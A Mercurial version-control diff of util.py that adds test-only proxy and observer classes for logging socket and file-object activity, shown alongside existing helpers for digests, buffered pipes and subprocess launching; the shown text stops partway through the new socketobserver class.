util: observable proxy objects for sockets...
Gregory Szorc
r37028:8453699a default
@@ -1,4091 +1,4324 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import codecs
21 21 import collections
22 22 import contextlib
23 23 import errno
24 24 import gc
25 25 import hashlib
26 26 import imp
27 27 import io
28 28 import itertools
29 29 import mmap
30 30 import os
31 31 import platform as pyplatform
32 32 import re as remod
33 33 import shutil
34 34 import signal
35 35 import socket
36 36 import stat
37 37 import string
38 38 import subprocess
39 39 import sys
40 40 import tempfile
41 41 import textwrap
42 42 import time
43 43 import traceback
44 44 import warnings
45 45 import zlib
46 46
47 47 from . import (
48 48 encoding,
49 49 error,
50 50 i18n,
51 51 node as nodemod,
52 52 policy,
53 53 pycompat,
54 54 urllibcompat,
55 55 )
56 56 from .utils import dateutil
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 empty = pycompat.empty
67 67 httplib = pycompat.httplib
68 68 pickle = pycompat.pickle
69 69 queue = pycompat.queue
70 70 socketserver = pycompat.socketserver
71 71 stderr = pycompat.stderr
72 72 stdin = pycompat.stdin
73 73 stdout = pycompat.stdout
74 74 bytesio = pycompat.bytesio
75 75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 76 stringio = bytesio
77 77 xmlrpclib = pycompat.xmlrpclib
78 78
79 79 httpserver = urllibcompat.httpserver
80 80 urlerr = urllibcompat.urlerr
81 81 urlreq = urllibcompat.urlreq
82 82
83 83 # workaround for win32mbcs
84 84 _filenamebytestr = pycompat.bytestr
85 85
86 86 def isatty(fp):
87 87 try:
88 88 return fp.isatty()
89 89 except AttributeError:
90 90 return False
91 91
92 92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 94 # buffering
95 95 if isatty(stdout):
96 96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97 97
98 98 if pycompat.iswindows:
99 99 from . import windows as platform
100 100 stdout = platform.winstdout(stdout)
101 101 else:
102 102 from . import posix as platform
103 103
104 104 _ = i18n._
105 105
106 106 bindunixsocket = platform.bindunixsocket
107 107 cachestat = platform.cachestat
108 108 checkexec = platform.checkexec
109 109 checklink = platform.checklink
110 110 copymode = platform.copymode
111 111 executablepath = platform.executablepath
112 112 expandglobs = platform.expandglobs
113 113 explainexit = platform.explainexit
114 114 findexe = platform.findexe
115 115 getfsmountpoint = platform.getfsmountpoint
116 116 getfstype = platform.getfstype
117 117 gethgcmd = platform.gethgcmd
118 118 getuser = platform.getuser
119 119 getpid = os.getpid
120 120 groupmembers = platform.groupmembers
121 121 groupname = platform.groupname
122 122 hidewindow = platform.hidewindow
123 123 isexec = platform.isexec
124 124 isowner = platform.isowner
125 125 listdir = osutil.listdir
126 126 localpath = platform.localpath
127 127 lookupreg = platform.lookupreg
128 128 makedir = platform.makedir
129 129 nlinks = platform.nlinks
130 130 normpath = platform.normpath
131 131 normcase = platform.normcase
132 132 normcasespec = platform.normcasespec
133 133 normcasefallback = platform.normcasefallback
134 134 openhardlinks = platform.openhardlinks
135 135 oslink = platform.oslink
136 136 parsepatchoutput = platform.parsepatchoutput
137 137 pconvert = platform.pconvert
138 138 poll = platform.poll
139 139 popen = platform.popen
140 140 posixfile = platform.posixfile
141 141 quotecommand = platform.quotecommand
142 142 readpipe = platform.readpipe
143 143 rename = platform.rename
144 144 removedirs = platform.removedirs
145 145 samedevice = platform.samedevice
146 146 samefile = platform.samefile
147 147 samestat = platform.samestat
148 148 setbinary = platform.setbinary
149 149 setflags = platform.setflags
150 150 setsignalhandler = platform.setsignalhandler
151 151 shellquote = platform.shellquote
152 152 shellsplit = platform.shellsplit
153 153 spawndetached = platform.spawndetached
154 154 split = platform.split
155 155 sshargs = platform.sshargs
156 156 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
157 157 statisexec = platform.statisexec
158 158 statislink = platform.statislink
159 159 testpid = platform.testpid
160 160 umask = platform.umask
161 161 unlink = platform.unlink
162 162 username = platform.username
163 163
164 164 try:
165 165 recvfds = osutil.recvfds
166 166 except AttributeError:
167 167 pass
168 168 try:
169 169 setprocname = osutil.setprocname
170 170 except AttributeError:
171 171 pass
172 172 try:
173 173 unblocksignal = osutil.unblocksignal
174 174 except AttributeError:
175 175 pass
176 176
177 177 # Python compatibility
178 178
179 179 _notset = object()
180 180
181 181 def safehasattr(thing, attr):
182 182 return getattr(thing, attr, _notset) is not _notset
183 183
184 184 def _rapply(f, xs):
185 185 if xs is None:
186 186 # assume None means non-value of optional data
187 187 return xs
188 188 if isinstance(xs, (list, set, tuple)):
189 189 return type(xs)(_rapply(f, x) for x in xs)
190 190 if isinstance(xs, dict):
191 191 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
192 192 return f(xs)
193 193
194 194 def rapply(f, xs):
195 195 """Apply function recursively to every item preserving the data structure
196 196
197 197 >>> def f(x):
198 198 ... return 'f(%s)' % x
199 199 >>> rapply(f, None) is None
200 200 True
201 201 >>> rapply(f, 'a')
202 202 'f(a)'
203 203 >>> rapply(f, {'a'}) == {'f(a)'}
204 204 True
205 205 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
206 206 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
207 207
208 208 >>> xs = [object()]
209 209 >>> rapply(pycompat.identity, xs) is xs
210 210 True
211 211 """
212 212 if f is pycompat.identity:
213 213 # fast path mainly for py2
214 214 return xs
215 215 return _rapply(f, xs)
216 216
217 217 def bitsfrom(container):
218 218 bits = 0
219 219 for bit in container:
220 220 bits |= bit
221 221 return bits
222 222
 223 223 # Python 2.6 still has deprecation warnings enabled by default. We do not
 224 224 # want to display anything to the standard user, so detect if we are running
 225 225 # tests and only use Python deprecation warnings in that case.
226 226 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
227 227 if _dowarn:
228 228 # explicitly unfilter our warning for python 2.7
229 229 #
230 230 # The option of setting PYTHONWARNINGS in the test runner was investigated.
231 231 # However, module name set through PYTHONWARNINGS was exactly matched, so
232 232 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
233 233 # makes the whole PYTHONWARNINGS thing useless for our usecase.
234 234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
235 235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
236 236 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
237 237 if _dowarn and pycompat.ispy3:
238 238 # silence warning emitted by passing user string to re.sub()
239 239 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
240 240 r'mercurial')
241 241 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
242 242 DeprecationWarning, r'mercurial')
243 243
244 244 def nouideprecwarn(msg, version, stacklevel=1):
245 245 """Issue an python native deprecation warning
246 246
247 247 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
248 248 """
249 249 if _dowarn:
250 250 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
251 251 " update your code.)") % version
252 252 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
253 253
254 254 DIGESTS = {
255 255 'md5': hashlib.md5,
256 256 'sha1': hashlib.sha1,
257 257 'sha512': hashlib.sha512,
258 258 }
259 259 # List of digest types from strongest to weakest
260 260 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
261 261
262 262 for k in DIGESTS_BY_STRENGTH:
263 263 assert k in DIGESTS
264 264
265 265 class digester(object):
266 266 """helper to compute digests.
267 267
268 268 This helper can be used to compute one or more digests given their name.
269 269
270 270 >>> d = digester([b'md5', b'sha1'])
271 271 >>> d.update(b'foo')
272 272 >>> [k for k in sorted(d)]
273 273 ['md5', 'sha1']
274 274 >>> d[b'md5']
275 275 'acbd18db4cc2f85cedef654fccc4a4d8'
276 276 >>> d[b'sha1']
277 277 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
278 278 >>> digester.preferred([b'md5', b'sha1'])
279 279 'sha1'
280 280 """
281 281
282 282 def __init__(self, digests, s=''):
283 283 self._hashes = {}
284 284 for k in digests:
285 285 if k not in DIGESTS:
286 286 raise Abort(_('unknown digest type: %s') % k)
287 287 self._hashes[k] = DIGESTS[k]()
288 288 if s:
289 289 self.update(s)
290 290
291 291 def update(self, data):
292 292 for h in self._hashes.values():
293 293 h.update(data)
294 294
295 295 def __getitem__(self, key):
296 296 if key not in DIGESTS:
 297 297 raise Abort(_('unknown digest type: %s') % key)
298 298 return nodemod.hex(self._hashes[key].digest())
299 299
300 300 def __iter__(self):
301 301 return iter(self._hashes)
302 302
303 303 @staticmethod
304 304 def preferred(supported):
305 305 """returns the strongest digest type in both supported and DIGESTS."""
306 306
307 307 for k in DIGESTS_BY_STRENGTH:
308 308 if k in supported:
309 309 return k
310 310 return None
311 311
312 312 class digestchecker(object):
313 313 """file handle wrapper that additionally checks content against a given
314 314 size and digests.
315 315
316 316 d = digestchecker(fh, size, {'md5': '...'})
317 317
318 318 When multiple digests are given, all of them are validated.
319 319 """
320 320
321 321 def __init__(self, fh, size, digests):
322 322 self._fh = fh
323 323 self._size = size
324 324 self._got = 0
325 325 self._digests = dict(digests)
326 326 self._digester = digester(self._digests.keys())
327 327
328 328 def read(self, length=-1):
329 329 content = self._fh.read(length)
330 330 self._digester.update(content)
331 331 self._got += len(content)
332 332 return content
333 333
334 334 def validate(self):
335 335 if self._size != self._got:
336 336 raise Abort(_('size mismatch: expected %d, got %d') %
337 337 (self._size, self._got))
338 338 for k, v in self._digests.items():
339 339 if v != self._digester[k]:
340 340 # i18n: first parameter is a digest name
341 341 raise Abort(_('%s mismatch: expected %s, got %s') %
342 342 (k, v, self._digester[k]))
343 343
344 344 try:
345 345 buffer = buffer
346 346 except NameError:
347 347 def buffer(sliceable, offset=0, length=None):
348 348 if length is not None:
349 349 return memoryview(sliceable)[offset:offset + length]
350 350 return memoryview(sliceable)[offset:]
351 351
352 352 closefds = pycompat.isposix
353 353
354 354 _chunksize = 4096
355 355
356 356 class bufferedinputpipe(object):
357 357 """a manually buffered input pipe
358 358
359 359 Python will not let us use buffered IO and lazy reading with 'polling' at
360 360 the same time. We cannot probe the buffer state and select will not detect
361 361 that data are ready to read if they are already buffered.
362 362
 363 363 This class lets us work around that by implementing its own buffering
364 364 (allowing efficient readline) while offering a way to know if the buffer is
365 365 empty from the output (allowing collaboration of the buffer with polling).
366 366
367 367 This class lives in the 'util' module because it makes use of the 'os'
368 368 module from the python stdlib.
369 369 """
370 370 def __new__(cls, fh):
371 371 # If we receive a fileobjectproxy, we need to use a variation of this
372 372 # class that notifies observers about activity.
373 373 if isinstance(fh, fileobjectproxy):
374 374 cls = observedbufferedinputpipe
375 375
376 376 return super(bufferedinputpipe, cls).__new__(cls)
377 377
378 378 def __init__(self, input):
379 379 self._input = input
380 380 self._buffer = []
381 381 self._eof = False
382 382 self._lenbuf = 0
383 383
384 384 @property
385 385 def hasbuffer(self):
386 386 """True is any data is currently buffered
387 387
388 388 This will be used externally a pre-step for polling IO. If there is
389 389 already data then no polling should be set in place."""
390 390 return bool(self._buffer)
391 391
392 392 @property
393 393 def closed(self):
394 394 return self._input.closed
395 395
396 396 def fileno(self):
397 397 return self._input.fileno()
398 398
399 399 def close(self):
400 400 return self._input.close()
401 401
402 402 def read(self, size):
403 403 while (not self._eof) and (self._lenbuf < size):
404 404 self._fillbuffer()
405 405 return self._frombuffer(size)
406 406
407 407 def readline(self, *args, **kwargs):
408 408 if 1 < len(self._buffer):
409 409 # this should not happen because both read and readline end with a
 410 410 # _frombuffer call that collapses it.
411 411 self._buffer = [''.join(self._buffer)]
412 412 self._lenbuf = len(self._buffer[0])
413 413 lfi = -1
414 414 if self._buffer:
415 415 lfi = self._buffer[-1].find('\n')
416 416 while (not self._eof) and lfi < 0:
417 417 self._fillbuffer()
418 418 if self._buffer:
419 419 lfi = self._buffer[-1].find('\n')
420 420 size = lfi + 1
421 421 if lfi < 0: # end of file
422 422 size = self._lenbuf
423 423 elif 1 < len(self._buffer):
424 424 # we need to take previous chunks into account
425 425 size += self._lenbuf - len(self._buffer[-1])
426 426 return self._frombuffer(size)
427 427
428 428 def _frombuffer(self, size):
429 429 """return at most 'size' data from the buffer
430 430
431 431 The data are removed from the buffer."""
432 432 if size == 0 or not self._buffer:
433 433 return ''
434 434 buf = self._buffer[0]
435 435 if 1 < len(self._buffer):
436 436 buf = ''.join(self._buffer)
437 437
438 438 data = buf[:size]
439 439 buf = buf[len(data):]
440 440 if buf:
441 441 self._buffer = [buf]
442 442 self._lenbuf = len(buf)
443 443 else:
444 444 self._buffer = []
445 445 self._lenbuf = 0
446 446 return data
447 447
448 448 def _fillbuffer(self):
449 449 """read data to the buffer"""
450 450 data = os.read(self._input.fileno(), _chunksize)
451 451 if not data:
452 452 self._eof = True
453 453 else:
454 454 self._lenbuf += len(data)
455 455 self._buffer.append(data)
456 456
457 457 return data
458 458
459 459 def mmapread(fp):
460 460 try:
461 461 fd = getattr(fp, 'fileno', lambda: fp)()
462 462 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
463 463 except ValueError:
464 464 # Empty files cannot be mmapped, but mmapread should still work. Check
465 465 # if the file is empty, and if so, return an empty buffer.
466 466 if os.fstat(fd).st_size == 0:
467 467 return ''
468 468 raise
469 469
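A small illustration of `mmapread` (hypothetical temp file, POSIX assumed; recall the fallback above returns '' for empty files, which cannot be mmapped):

    import tempfile
    from mercurial import util

    with tempfile.NamedTemporaryFile() as tf:
        tf.write(b'revlog data')
        tf.flush()
        with open(tf.name, 'rb') as fp:
            buf = util.mmapread(fp)        # mmap.mmap object
            assert bytes(buf[:6]) == b'revlog'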
470 470 def popen2(cmd, env=None, newlines=False):
471 471 # Setting bufsize to -1 lets the system decide the buffer size.
472 472 # The default for bufsize is 0, meaning unbuffered. This leads to
473 473 # poor performance on Mac OS X: http://bugs.python.org/issue4194
474 474 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
475 475 close_fds=closefds,
476 476 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
477 477 universal_newlines=newlines,
478 478 env=env)
479 479 return p.stdin, p.stdout
480 480
481 481 def popen3(cmd, env=None, newlines=False):
482 482 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
483 483 return stdin, stdout, stderr
484 484
485 485 def popen4(cmd, env=None, newlines=False, bufsize=-1):
486 486 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
487 487 close_fds=closefds,
488 488 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
489 489 stderr=subprocess.PIPE,
490 490 universal_newlines=newlines,
491 491 env=env)
492 492 return p.stdin, p.stdout, p.stderr, p
493 493
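A hedged sketch of the popen helpers (POSIX shell assumed; `tr` and `false` are illustrative commands):

    from mercurial import util

    stdin, stdout = util.popen2(b'tr a-z A-Z')
    stdin.write(b'hello\n')
    stdin.close()
    stdout.read()          # b'HELLO\n'

    # popen4 additionally exposes stderr and the Popen object itself,
    # so callers can wait() and inspect the return code.
    i, o, e, p = util.popen4(b'false')
    i.close()
    p.wait()               # 1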
494 494 class fileobjectproxy(object):
495 495 """A proxy around file objects that tells a watcher when events occur.
496 496
497 497 This type is intended to only be used for testing purposes. Think hard
498 498 before using it in important code.
499 499 """
500 500 __slots__ = (
501 501 r'_orig',
502 502 r'_observer',
503 503 )
504 504
505 505 def __init__(self, fh, observer):
506 506 object.__setattr__(self, r'_orig', fh)
507 507 object.__setattr__(self, r'_observer', observer)
508 508
509 509 def __getattribute__(self, name):
510 510 ours = {
511 511 r'_observer',
512 512
513 513 # IOBase
514 514 r'close',
 515 515 # closed is a property
516 516 r'fileno',
517 517 r'flush',
518 518 r'isatty',
519 519 r'readable',
520 520 r'readline',
521 521 r'readlines',
522 522 r'seek',
523 523 r'seekable',
524 524 r'tell',
525 525 r'truncate',
526 526 r'writable',
527 527 r'writelines',
528 528 # RawIOBase
529 529 r'read',
530 530 r'readall',
531 531 r'readinto',
532 532 r'write',
533 533 # BufferedIOBase
534 534 # raw is a property
535 535 r'detach',
536 536 # read defined above
537 537 r'read1',
538 538 # readinto defined above
539 539 # write defined above
540 540 }
541 541
542 542 # We only observe some methods.
543 543 if name in ours:
544 544 return object.__getattribute__(self, name)
545 545
546 546 return getattr(object.__getattribute__(self, r'_orig'), name)
547 547
548 548 def __nonzero__(self):
549 549 return bool(object.__getattribute__(self, r'_orig'))
550 550
551 551 __bool__ = __nonzero__
552 552
553 553 def __delattr__(self, name):
554 554 return delattr(object.__getattribute__(self, r'_orig'), name)
555 555
556 556 def __setattr__(self, name, value):
557 557 return setattr(object.__getattribute__(self, r'_orig'), name, value)
558 558
559 559 def __iter__(self):
560 560 return object.__getattribute__(self, r'_orig').__iter__()
561 561
562 562 def _observedcall(self, name, *args, **kwargs):
563 563 # Call the original object.
564 564 orig = object.__getattribute__(self, r'_orig')
565 565 res = getattr(orig, name)(*args, **kwargs)
566 566
567 567 # Call a method on the observer of the same name with arguments
568 568 # so it can react, log, etc.
569 569 observer = object.__getattribute__(self, r'_observer')
570 570 fn = getattr(observer, name, None)
571 571 if fn:
572 572 fn(res, *args, **kwargs)
573 573
574 574 return res
575 575
576 576 def close(self, *args, **kwargs):
577 577 return object.__getattribute__(self, r'_observedcall')(
578 578 r'close', *args, **kwargs)
579 579
580 580 def fileno(self, *args, **kwargs):
581 581 return object.__getattribute__(self, r'_observedcall')(
582 582 r'fileno', *args, **kwargs)
583 583
584 584 def flush(self, *args, **kwargs):
585 585 return object.__getattribute__(self, r'_observedcall')(
586 586 r'flush', *args, **kwargs)
587 587
588 588 def isatty(self, *args, **kwargs):
589 589 return object.__getattribute__(self, r'_observedcall')(
590 590 r'isatty', *args, **kwargs)
591 591
592 592 def readable(self, *args, **kwargs):
593 593 return object.__getattribute__(self, r'_observedcall')(
594 594 r'readable', *args, **kwargs)
595 595
596 596 def readline(self, *args, **kwargs):
597 597 return object.__getattribute__(self, r'_observedcall')(
598 598 r'readline', *args, **kwargs)
599 599
600 600 def readlines(self, *args, **kwargs):
601 601 return object.__getattribute__(self, r'_observedcall')(
602 602 r'readlines', *args, **kwargs)
603 603
604 604 def seek(self, *args, **kwargs):
605 605 return object.__getattribute__(self, r'_observedcall')(
606 606 r'seek', *args, **kwargs)
607 607
608 608 def seekable(self, *args, **kwargs):
609 609 return object.__getattribute__(self, r'_observedcall')(
610 610 r'seekable', *args, **kwargs)
611 611
612 612 def tell(self, *args, **kwargs):
613 613 return object.__getattribute__(self, r'_observedcall')(
614 614 r'tell', *args, **kwargs)
615 615
616 616 def truncate(self, *args, **kwargs):
617 617 return object.__getattribute__(self, r'_observedcall')(
618 618 r'truncate', *args, **kwargs)
619 619
620 620 def writable(self, *args, **kwargs):
621 621 return object.__getattribute__(self, r'_observedcall')(
622 622 r'writable', *args, **kwargs)
623 623
624 624 def writelines(self, *args, **kwargs):
625 625 return object.__getattribute__(self, r'_observedcall')(
626 626 r'writelines', *args, **kwargs)
627 627
628 628 def read(self, *args, **kwargs):
629 629 return object.__getattribute__(self, r'_observedcall')(
630 630 r'read', *args, **kwargs)
631 631
632 632 def readall(self, *args, **kwargs):
633 633 return object.__getattribute__(self, r'_observedcall')(
634 634 r'readall', *args, **kwargs)
635 635
636 636 def readinto(self, *args, **kwargs):
637 637 return object.__getattribute__(self, r'_observedcall')(
638 638 r'readinto', *args, **kwargs)
639 639
640 640 def write(self, *args, **kwargs):
641 641 return object.__getattribute__(self, r'_observedcall')(
642 642 r'write', *args, **kwargs)
643 643
644 644 def detach(self, *args, **kwargs):
645 645 return object.__getattribute__(self, r'_observedcall')(
646 646 r'detach', *args, **kwargs)
647 647
648 648 def read1(self, *args, **kwargs):
649 649 return object.__getattribute__(self, r'_observedcall')(
650 650 r'read1', *args, **kwargs)
651 651
652 652 class observedbufferedinputpipe(bufferedinputpipe):
653 653 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
654 654
655 655 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
656 656 bypass ``fileobjectproxy``. Because of this, we need to make
657 657 ``bufferedinputpipe`` aware of these operations.
658 658
659 659 This variation of ``bufferedinputpipe`` can notify observers about
660 660 ``os.read()`` events. It also re-publishes other events, such as
661 661 ``read()`` and ``readline()``.
662 662 """
663 663 def _fillbuffer(self):
664 664 res = super(observedbufferedinputpipe, self)._fillbuffer()
665 665
666 666 fn = getattr(self._input._observer, r'osread', None)
667 667 if fn:
668 668 fn(res, _chunksize)
669 669
670 670 return res
671 671
672 672 # We use different observer methods because the operation isn't
673 673 # performed on the actual file object but on us.
674 674 def read(self, size):
675 675 res = super(observedbufferedinputpipe, self).read(size)
676 676
677 677 fn = getattr(self._input._observer, r'bufferedread', None)
678 678 if fn:
679 679 fn(res, size)
680 680
681 681 return res
682 682
683 683 def readline(self, *args, **kwargs):
684 684 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
685 685
686 686 fn = getattr(self._input._observer, r'bufferedreadline', None)
687 687 if fn:
688 688 fn(res)
689 689
690 690 return res
691 691
692 PROXIED_SOCKET_METHODS = {
693 r'makefile',
694 r'recv',
695 r'recvfrom',
696 r'recvfrom_into',
697 r'recv_into',
698 r'send',
699 r'sendall',
700 r'sendto',
701 r'setblocking',
702 r'settimeout',
703 r'gettimeout',
704 r'setsockopt',
705 }
706
707 class socketproxy(object):
708 """A proxy around a socket that tells a watcher when events occur.
709
710 This is like ``fileobjectproxy`` except for sockets.
711
712 This type is intended to only be used for testing purposes. Think hard
713 before using it in important code.
714 """
715 __slots__ = (
716 r'_orig',
717 r'_observer',
718 )
719
720 def __init__(self, sock, observer):
721 object.__setattr__(self, r'_orig', sock)
722 object.__setattr__(self, r'_observer', observer)
723
724 def __getattribute__(self, name):
725 if name in PROXIED_SOCKET_METHODS:
726 return object.__getattribute__(self, name)
727
728 return getattr(object.__getattribute__(self, r'_orig'), name)
729
730 def __delattr__(self, name):
731 return delattr(object.__getattribute__(self, r'_orig'), name)
732
733 def __setattr__(self, name, value):
734 return setattr(object.__getattribute__(self, r'_orig'), name, value)
735
736 def __nonzero__(self):
737 return bool(object.__getattribute__(self, r'_orig'))
738
739 __bool__ = __nonzero__
740
741 def _observedcall(self, name, *args, **kwargs):
742 # Call the original object.
743 orig = object.__getattribute__(self, r'_orig')
744 res = getattr(orig, name)(*args, **kwargs)
745
746 # Call a method on the observer of the same name with arguments
747 # so it can react, log, etc.
748 observer = object.__getattribute__(self, r'_observer')
749 fn = getattr(observer, name, None)
750 if fn:
751 fn(res, *args, **kwargs)
752
753 return res
754
755 def makefile(self, *args, **kwargs):
756 res = object.__getattribute__(self, r'_observedcall')(
757 r'makefile', *args, **kwargs)
758
759 # The file object may be used for I/O. So we turn it into a
760 # proxy using our observer.
761 observer = object.__getattribute__(self, r'_observer')
762 return makeloggingfileobject(observer.fh, res, observer.name,
763 reads=observer.reads,
764 writes=observer.writes,
765 logdata=observer.logdata)
766
767 def recv(self, *args, **kwargs):
768 return object.__getattribute__(self, r'_observedcall')(
769 r'recv', *args, **kwargs)
770
771 def recvfrom(self, *args, **kwargs):
772 return object.__getattribute__(self, r'_observedcall')(
773 r'recvfrom', *args, **kwargs)
774
775 def recvfrom_into(self, *args, **kwargs):
776 return object.__getattribute__(self, r'_observedcall')(
777 r'recvfrom_into', *args, **kwargs)
778
779 def recv_into(self, *args, **kwargs):
780 return object.__getattribute__(self, r'_observedcall')(
 781 r'recv_into', *args, **kwargs)
782
783 def send(self, *args, **kwargs):
784 return object.__getattribute__(self, r'_observedcall')(
785 r'send', *args, **kwargs)
786
787 def sendall(self, *args, **kwargs):
788 return object.__getattribute__(self, r'_observedcall')(
789 r'sendall', *args, **kwargs)
790
791 def sendto(self, *args, **kwargs):
792 return object.__getattribute__(self, r'_observedcall')(
793 r'sendto', *args, **kwargs)
794
795 def setblocking(self, *args, **kwargs):
796 return object.__getattribute__(self, r'_observedcall')(
797 r'setblocking', *args, **kwargs)
798
799 def settimeout(self, *args, **kwargs):
800 return object.__getattribute__(self, r'_observedcall')(
801 r'settimeout', *args, **kwargs)
802
803 def gettimeout(self, *args, **kwargs):
804 return object.__getattribute__(self, r'_observedcall')(
805 r'gettimeout', *args, **kwargs)
806
807 def setsockopt(self, *args, **kwargs):
808 return object.__getattribute__(self, r'_observedcall')(
809 r'setsockopt', *args, **kwargs)
810
692 811 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
693 812 DATA_ESCAPE_MAP.update({
694 813 b'\\': b'\\\\',
695 814 b'\r': br'\r',
696 815 b'\n': br'\n',
697 816 })
698 817 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
699 818
700 819 def escapedata(s):
701 820 if isinstance(s, bytearray):
702 821 s = bytes(s)
703 822
704 823 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
705 824
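For example, given the table above:

    from mercurial import util

    util.escapedata(b'a\nb\x00\\')   # -> b'a\\nb\\x00\\\\'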
706 class fileobjectobserver(object):
707 """Logs file object activity."""
708 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
709 self.fh = fh
710 self.name = name
711 self.logdata = logdata
712 self.reads = reads
713 self.writes = writes
714
825 class baseproxyobserver(object):
715 826 def _writedata(self, data):
716 827 if not self.logdata:
717 828 self.fh.write('\n')
718 829 self.fh.flush()
719 830 return
720 831
721 832 # Simple case writes all data on a single line.
722 833 if b'\n' not in data:
723 834 self.fh.write(': %s\n' % escapedata(data))
724 835 self.fh.flush()
725 836 return
726 837
727 838 # Data with newlines is written to multiple lines.
728 839 self.fh.write(':\n')
729 840 lines = data.splitlines(True)
730 841 for line in lines:
731 842 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
732 843 self.fh.flush()
733 844
845 class fileobjectobserver(baseproxyobserver):
846 """Logs file object activity."""
847 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
848 self.fh = fh
849 self.name = name
850 self.logdata = logdata
851 self.reads = reads
852 self.writes = writes
853
734 854 def read(self, res, size=-1):
735 855 if not self.reads:
736 856 return
737 857 # Python 3 can return None from reads at EOF instead of empty strings.
738 858 if res is None:
739 859 res = ''
740 860
741 861 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
742 862 self._writedata(res)
743 863
744 864 def readline(self, res, limit=-1):
745 865 if not self.reads:
746 866 return
747 867
748 868 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
749 869 self._writedata(res)
750 870
751 871 def readinto(self, res, dest):
752 872 if not self.reads:
753 873 return
754 874
755 875 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
756 876 res))
757 877 data = dest[0:res] if res is not None else b''
758 878 self._writedata(data)
759 879
760 880 def write(self, res, data):
761 881 if not self.writes:
762 882 return
763 883
764 884 # Python 2 returns None from some write() calls. Python 3 (reasonably)
 765 885 # returns the number of bytes written.
766 886 if res is None and data:
767 887 res = len(data)
768 888
769 889 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
770 890 self._writedata(data)
771 891
772 892 def flush(self, res):
773 893 if not self.writes:
774 894 return
775 895
776 896 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
777 897
778 898 # For observedbufferedinputpipe.
779 899 def bufferedread(self, res, size):
780 900 self.fh.write('%s> bufferedread(%d) -> %d' % (
781 901 self.name, size, len(res)))
782 902 self._writedata(res)
783 903
784 904 def bufferedreadline(self, res):
785 905 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
786 906 self._writedata(res)
787 907
788 908 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
789 909 logdata=False):
790 910 """Turn a file object into a logging file object."""
791 911
792 912 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
793 913 logdata=logdata)
794 914 return fileobjectproxy(fh, observer)
795 915
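A minimal sketch of the intended (test-oriented) use: wrap a file object so every observed call is mirrored to a log handle. Python 2 string semantics are assumed, matching the bytes-oriented formatting in the observers above:

    import io
    from mercurial import util

    log = io.BytesIO()
    fh = io.BytesIO(b'line one\nline two\n')
    proxy = util.makeloggingfileobject(log, fh, b'myfile', logdata=True)
    proxy.readline()   # returns b'line one\n'; log now holds
                       # "myfile> readline() -> 9" plus the escaped data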
916 class socketobserver(baseproxyobserver):
917 """Logs socket activity."""
918 def __init__(self, fh, name, reads=True, writes=True, states=True,
919 logdata=False):
920 self.fh = fh
921 self.name = name
922 self.reads = reads
923 self.writes = writes
924 self.states = states
925 self.logdata = logdata
926
927 def makefile(self, res, mode=None, bufsize=None):
928 if not self.states:
929 return
930
931 self.fh.write('%s> makefile(%r, %r)\n' % (
932 self.name, mode, bufsize))
933
934 def recv(self, res, size, flags=0):
935 if not self.reads:
936 return
937
938 self.fh.write('%s> recv(%d, %d) -> %d' % (
939 self.name, size, flags, len(res)))
940 self._writedata(res)
941
942 def recvfrom(self, res, size, flags=0):
943 if not self.reads:
944 return
945
